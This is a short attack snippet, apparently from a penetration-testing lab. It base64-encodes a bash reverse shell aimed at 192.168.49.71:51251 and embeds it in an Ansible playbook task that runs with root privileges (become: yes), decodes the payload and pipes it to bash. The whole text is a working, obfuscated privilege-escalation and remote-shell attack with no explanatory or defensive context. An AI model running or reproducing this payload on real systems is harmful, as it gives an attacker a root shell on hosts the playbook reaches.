echo "bash -i >& /dev/tcp/192.168.49.71/51251 0>&1" | base64
################
- name: Write a file as offsec
  hosts: all
  become: yes
  gather_facts: true
  tasks:
  -  name : kill
     shell: 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjcxLzUxMjUxIDA+JjEK | base64 -d | bash'
